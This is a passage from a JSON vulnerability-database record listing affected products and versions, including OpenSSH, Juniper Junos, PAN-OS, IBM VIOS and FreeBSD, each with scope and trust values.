"version": "0"
},
{
"model": "vios",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "2.2.3.50"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "7.0.1"
},
{
"model": "junos 13.3r2",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.6,
"vendor": "apple",
"version": "x10.11"
},
{
"model": "extremexos",
"scope": "eq",
"trust": 0.6,
"vendor": "extremenetworks",
"version": "15.7"
},
{
"model": "junos 15.1x49-d15",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "junos 12.1x46-d20",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "vios",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "2.2.1.8"
},
{
"model": "linux x86 64",
"scope": "eq",
"trust": 0.6,
"vendor": "slackware",
"version": "13.1"
},
{
"model": "enterprise linux server",
"scope": "eq",
"trust": 0.6,
"vendor": "redhat",
"version": "7"
},
{
"model": "vios",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "2.2.3.2"
},
{
"model": "linux x86 64 -current",
"scope": null,
"trust": 0.6,
"vendor": "slackware",
"version": null
},
{
"model": "nac appliance",
"scope": "ne",
"trust": 0.6,
"vendor": "extremenetworks",
"version": "7.0.3"
},
{
"model": "power hmc",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "8.1.0.0"
},
{
"model": "junos 14.1r3",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "5.0.10"
},
{
"model": "junos 12.1x46-d45",
"scope": "ne",
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "5.0.14"
},
{
"model": "junos 13.3r5",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "junos 15.1r1",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "6.2p1",
"scope": null,
"trust": 0.6,
"vendor": "openssh",
"version": null
},
{
"model": "junos 12.1x47-d11",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "purepower integrated manager vhmc appliance",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "1.1.0"
},
{
"model": "junos 15.1x49-d10",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "5.1.2"
},
{
"model": "power hmc",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "8.4.0.0"
},
{
"model": "aix",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "5.3"
},
{
"model": "junos 15.1f3",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "flex system manager",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "1.2.0.0"
},
{
"model": "vios",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "2.2.0.10"
},
{
"model": "extremexos",
"scope": "eq",
"trust": 0.6,
"vendor": "extremenetworks",
"version": "16.1.2"
},
{
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 0.6,
"vendor": "redhat",
"version": "7"
},
{
"model": "enterprise linux workstation",
"scope": "eq",
"trust": 0.6,
"vendor": "redhat",
"version": "7"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "5.0.8"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "5.0.1"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "7.0.8"
},
{
"model": "netsight appliance",
"scope": "ne",
"trust": 0.6,
"vendor": "extremenetworks",
"version": "6.3.0.179"
},
{
"model": "extremexos patch",
"scope": "ne",
"trust": 0.6,
"vendor": "extremenetworks",
"version": "15.7.38"
},
{
"model": "junos 15.1r2",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "junos 15.1f2",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "nac appliance",
"scope": "eq",
"trust": 0.6,
"vendor": "extremenetworks",
"version": "5.0"
},
{
"model": "linux x86 64",
"scope": "eq",
"trust": 0.6,
"vendor": "slackware",
"version": "13.37"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "5.0.5"
},
{
"model": "junos 15.1x49-d20",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "netsight appliance",
"scope": "eq",
"trust": 0.6,
"vendor": "extremenetworks",
"version": "5.0"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "5.1.4"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.6,
"vendor": "openssh",
"version": "6.6"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "6.1.2"
},
{
"model": "junos 14.1r5",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.6,
"vendor": "openssh",
"version": "6.4"
},
{
"model": "vios",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "2.2.3.3"
},
{
"model": "nac appliance",
"scope": "eq",
"trust": 0.6,
"vendor": "extremenetworks",
"version": "6.0"
},
{
"model": "linux sparc",
"scope": "eq",
"trust": 0.6,
"vendor": "debian",
"version": "6.0"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.6,
"vendor": "apple",
"version": "x10.9.5"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.6,
"vendor": "openssh",
"version": "5.7"
},
{
"model": "linux x86 64",
"scope": "eq",
"trust": 0.6,
"vendor": "slackware",
"version": "14.1"
},
{
"model": "flex system manager",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "1.3.4.0"
},
{
"model": "5.6p1",
"scope": null,
"trust": 0.6,
"vendor": "openssh",
"version": null
},
{
"model": "nsm4000",
"scope": "eq",
"trust": 0.6,
"vendor": "juniper",
"version": "0"
},
{
"model": "junos 13.3r6",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "junos 12.1x47-d20",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "vios",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "2.2.3"
},
{
"model": "netsight appliance",
"scope": "eq",
"trust": 0.6,
"vendor": "extremenetworks",
"version": "6.0"
},
{
"model": "junos 14.1r7",
"scope": "ne",
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "junos 14.1r1",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "virtual customer access system",
"scope": "eq",
"trust": 0.6,
"vendor": "hp",
"version": "14.06"
},
{
"model": "junos 12.1x46-d10",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "extremexos",
"scope": "eq",
"trust": 0.6,
"vendor": "extremenetworks",
"version": "16.2"
},
{
"model": "linux -current",
"scope": null,
"trust": 0.6,
"vendor": "slackware",
"version": null
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "5.1.5"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "6.1.9"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "5.0.9"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "5.0.15"
},
{
"model": "power hmc",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "8.2.0.0"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.6,
"vendor": "apple",
"version": "x10.11.2"
},
{
"model": "linux",
"scope": "eq",
"trust": 0.6,
"vendor": "slackware",
"version": "13.1"
},
{
"model": "junos 12.1x47-d10",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "nac appliance",
"scope": "ne",
"trust": 0.6,
"vendor": "extremenetworks",
"version": "6.3.0.179"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "5.0.4"
},
{
"model": "opensuse evergreen",
"scope": "eq",
"trust": 0.6,
"vendor": "suse",
"version": "11.4"
},
{
"model": "linux",
"scope": "eq",
"trust": 0.6,
"vendor": "slackware",
"version": "13.37"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.6,
"vendor": "openssh",
"version": "5.8"
},
{
"model": "flex system manager",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "1.3.1.0"
},
{
"model": "junos 14.1r4",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "linux",
"scope": "eq",
"trust": 0.6,
"vendor": "ubuntu",
"version": "15.10"
},
{
"model": "i",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "7.1"
},
{
"model": "virtual customer access system",
"scope": "eq",
"trust": 0.6,
"vendor": "hp",
"version": "15.07"
},
{
"model": "linux",
"scope": "eq",
"trust": 0.6,
"vendor": "slackware",
"version": "13.0"
},
{
"model": "identifi wireless",
"scope": "eq",
"trust": 0.6,
"vendor": "extremenetworks",
"version": "10.11"
},
{
"model": "tivoli provisioning manager for images",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "7.1.1.0"
},
{
"model": "7.1p2",
"scope": "ne",
"trust": 0.6,
"vendor": "openssh",
"version": null
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.6,
"vendor": "openssh",
"version": "6.0"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "7.0.4"
},
{
"model": "junos 12.3x48-d25",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "junos 12.3x48-d15",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "flex system manager",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "1.1.0.0"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.6,
"vendor": "oracle",
"version": "7"
},
{
"model": "linux lts",
"scope": "eq",
"trust": 0.6,
"vendor": "ubuntu",
"version": "14.04"
},
{
"model": "flex system manager",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "1.1"
},
{
"model": "extremexos patch",
"scope": "ne",
"trust": 0.6,
"vendor": "extremenetworks",
"version": "15.7.31"
},
{
"model": "vios",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "2.2.2.4"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "6.0.13"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.6,
"vendor": "openssh",
"version": "5.5"
},
{
"model": "linux",
"scope": null,
"trust": 0.6,
"vendor": "gentoo",
"version": null
},
{
"model": "mac os security update",
"scope": "ne",
"trust": 0.6,
"vendor": "apple",
"version": "x2016-0020"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.6,
"vendor": "openssh",
"version": "6.8"
},
{
"model": "junos 14.2r6",
"scope": "ne",
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "linux amd64",
"scope": "eq",
"trust": 0.6,
"vendor": "debian",
"version": "6.0"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "5.1.3"
},
{
"model": "junos 12.3x48-d30",
"scope": "ne",
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "6.0"
},
{
"model": "i",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "7.2"
},
{
"model": "netsight appliance",
"scope": "eq",
"trust": 0.6,
"vendor": "extremenetworks",
"version": "4.4"
},
{
"model": "junos 12.1x47-d25",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "vios",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "2.2.2.0"
},
{
"model": "junos 12.3r12",
"scope": "ne",
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "purepower integrated manager appliance",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "1.1"
},
{
"model": "flex system chassis management module 2pet",
"scope": null,
"trust": 0.6,
"vendor": "ibm",
"version": null
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.6,
"vendor": "apple",
"version": "x10.11.1"
},
{
"model": "vios",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "2.2.0.12"
},
{
"model": "vios",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "2.2.2.5"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "7.0.7"
},
{
"model": "flex system manager",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "1.3.2"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "5.0.2"
},
{
"model": "tivoli provisioning manager for os deployment",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "7.1.1.19"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "6.0.6"
},
{
"model": "junos 15.1f1",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "7.1.2"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "6.0.12"
},
{
"model": "junos 13.3r1",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "vios",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "2.2.1.1"
},
{
"model": "opensuse",
"scope": "eq",
"trust": 0.6,
"vendor": "s u s e",
"version": "13.1"
},
{
"model": "junos 12.1x46-d30",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "i",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "6.1"
},
{
"model": "aix",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "7.1"
},
{
"model": "extremexos",
"scope": "ne",
"trust": 0.6,
"vendor": "extremenetworks",
"version": "16.2.1"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.6,
"vendor": "apple",
"version": "x10.11.3"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.6,
"vendor": "openssh",
"version": "6.3"
},
{
"model": "junos 13.3r3",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "junos 12.1x46-d25",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "6.2p2",
"scope": null,
"trust": 0.6,
"vendor": "openssh",
"version": null
},
{
"model": "junos 12.3x48-d20",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "linux ia-32",
"scope": "eq",
"trust": 0.6,
"vendor": "debian",
"version": "6.0"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.6,
"vendor": "openssh",
"version": "7.1"
},
{
"model": "linux lts",
"scope": "eq",
"trust": 0.6,
"vendor": "ubuntu",
"version": "12.04"
},
{
"model": "tivoli provisioning manager for os deployment",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "7.1.1"
},
{
"model": "linux mips",
"scope": "eq",
"trust": 0.6,
"vendor": "debian",
"version": "6.0"
},
{
"model": "aix",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "7.2"
},
{
"model": "purview",
"scope": "eq",
"trust": 0.6,
"vendor": "extremenetworks",
"version": "0"
},
{
"model": "nac appliance",
"scope": "eq",
"trust": 0.6,
"vendor": "extremenetworks",
"version": "5.1"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "6.1.3"
},
{
"model": "junos 12.1x46-d36",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "purview",
"scope": "ne",
"trust": 0.6,
"vendor": "extremenetworks",
"version": "6.3"
},
{
"model": "junos 14.2r4",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "5.0.6"
},
{
"model": "flex system manager",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "1.2.1"
},
{
"model": "junos 15.1r3",
"scope": "ne",
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "flex system manager",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "1.3.3.0"
},
{
"model": "netsight appliance",
"scope": "eq",
"trust": 0.6,
"vendor": "extremenetworks",
"version": "5.1"
},
{
"model": "junos 12.1x46-d40",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "7.1.1"
},
{
"model": "linux",
"scope": "eq",
"trust": 0.6,
"vendor": "slackware",
"version": "14.1"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.6,
"vendor": "openssh",
"version": "6.9"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "7.1"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.6,
"vendor": "openssh",
"version": "6.2"
},
{
"model": "junos 15.1x49-d30",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "vios",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "2.2.4.0"
},
{
"model": "vios",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "2.2.2.6"
},
{
"model": "linux s/390",
"scope": "eq",
"trust": 0.6,
"vendor": "debian",
"version": "6.0"
},
{
"model": "virtual customer access system",
"scope": "ne",
"trust": 0.6,
"vendor": "hp",
"version": "16.05"
},
{
"model": "linux x86 64",
"scope": "eq",
"trust": 0.6,
"vendor": "slackware",
"version": "14.0"
},
{
"model": "vios",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "2.2.14"
},
{
"model": "junos 13.3r9",
"scope": "ne",
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "flex system manager",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "1.3.0.0"
},
{
"model": "remote device access",
"scope": "eq",
"trust": 0.6,
"vendor": "hp",
"version": "8.1"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "5.1.9"
},
{
"model": "junos 14.2r3",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "junos 14.2r5",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "vios",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "2.2.3.0"
},
{
"model": "linux powerpc",
"scope": "eq",
"trust": 0.6,
"vendor": "debian",
"version": "6.0"
},
{
"model": "tivoli provisioning manager for images",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "x7.1.1.0"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.6,
"vendor": "openssh",
"version": "5.4"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "5.0.7"
},
{
"model": "aix",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "6.1"
},
{
"model": "power hmc",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "7.3.0.0"
},
{
"model": "remote device access",
"scope": "ne",
"trust": 0.6,
"vendor": "hp",
"version": "8.7"
},
{
"model": "vios",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "2.2.1.0"
},
{
"model": "flex system manager",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "1.2"
},
{
"model": "junos 15.1f5",
"scope": "ne",
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "junos 14.2r1",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "vios",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "2.2.1.3"
},
{
"model": "junos 12.1x46-d15",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "flex system manager",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "1.3.1"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.6,
"vendor": "openssh",
"version": "5.6"
},
{
"model": "smartcloud provisioning for software virtual appliance",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "2.1"
},
{
"model": "junos 12.1x47-d15",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "vios",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "2.2"
},
{
"model": "enterprise linux hpc node",
"scope": "eq",
"trust": 0.6,
"vendor": "redhat",
"version": "7"
},
{
"model": "junos 14.1r2",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.6,
"vendor": "openssh",
"version": "6.1"
},
{
"model": "extremexos",
"scope": "eq",
"trust": 0.6,
"vendor": "extremenetworks",
"version": "15.7.2"
},
{
"model": "vios",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "2.2.0.11"
},
{
"model": "flex system manager",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "1.3.20"
},
{
"model": "junos 12.1x47-d35",
"scope": "ne",
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "6.1.4"
},
{
"model": "junos 12.3x48-d10",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "junos 12.1x46-d26",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "flex system manager",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "1.3.0.1"
},
{
"model": "identifi wireless",
"scope": "ne",
"trust": 0.6,
"vendor": "extremenetworks",
"version": "10.11.1"
},
{
"model": "p2",
"scope": "eq",
"trust": 0.6,
"vendor": "openssh",
"version": "5.8"
},
{
"model": "netsight appliance",
"scope": "ne",
"trust": 0.6,
"vendor": "extremenetworks",
"version": "7.0.3"
},
{
"model": "vios",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "2.2.1.9"
},
{
"model": "purepower integrated manager power vc appliance",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "1.1"
},
{
"model": "opensuse",
"scope": "eq",
"trust": 0.6,
"vendor": "s u s e",
"version": "13.2"
},
{
"model": "junos 12.3r10",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "tivoli provisioning manager for images",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "7.1.1.19"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "6.0.5"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.6,
"vendor": "openssh",
"version": "7.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 0.6,
"vendor": "ubuntu",
"version": "15.04"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "5.1.1"
},
{
"model": "flex system manager",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "1.3.0"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "6.0.9"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "6.1.10"
},
{
"model": "junos 14.1r6",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.6,
"vendor": "apple",
"version": "x10.10.5"
},
{
"model": "6.9p1",
"scope": null,
"trust": 0.6,
"vendor": "openssh",
"version": null
},
{
"model": "junos 12.3r11",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "6.0.70"
},
{
"model": "junos 13.3r8",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "6.1.00"
},
{
"model": "junos 13.3r7",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "10.2-rc1-p2",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.2-release-p8",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.0-release-p13",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.1-release-p5",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "9.3-release-p22",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.1-rc1-p1",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "9.3-release-p10",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "9.3-release-p1",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.0-release-p1",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.1-release-p17",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.1-releng",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "9.3-beta3-p2",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.2-release-p6",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.1-rc2-p3",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "junos 12.1x47-d30",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "10.0-release-p9",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.0-stable",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "9.3-rc",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "9.3-beta1",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.2-rc2-p1",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.1-rc2-p1",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "9.3-release-p34",
"scope": "ne",
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.1-release",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.0-rc3-p1",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "9.3-release-p2",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "9.3-stable",
"scope": "ne",
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.1-release-p1",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.0-release-p8",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.1-release-p9",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "9.3-rc2-p1",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "extremexos",
"scope": "eq",
"trust": 0.3,
"vendor": "extremenetworks",
"version": "21.1.1"
},
{
"model": "10.2-rc1-p1",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "junos 13.3r1.7",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "10.1-beta1-p1",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.0-release-p10",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "9.3-release-p3",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.0-release-p5",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.1-stable",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.1-release-p27",
"scope": "ne",
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "9.3-beta1-p1",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "9.3-release-p25",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.2-beta2-p2",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.0-release-p4",
"scope": null,
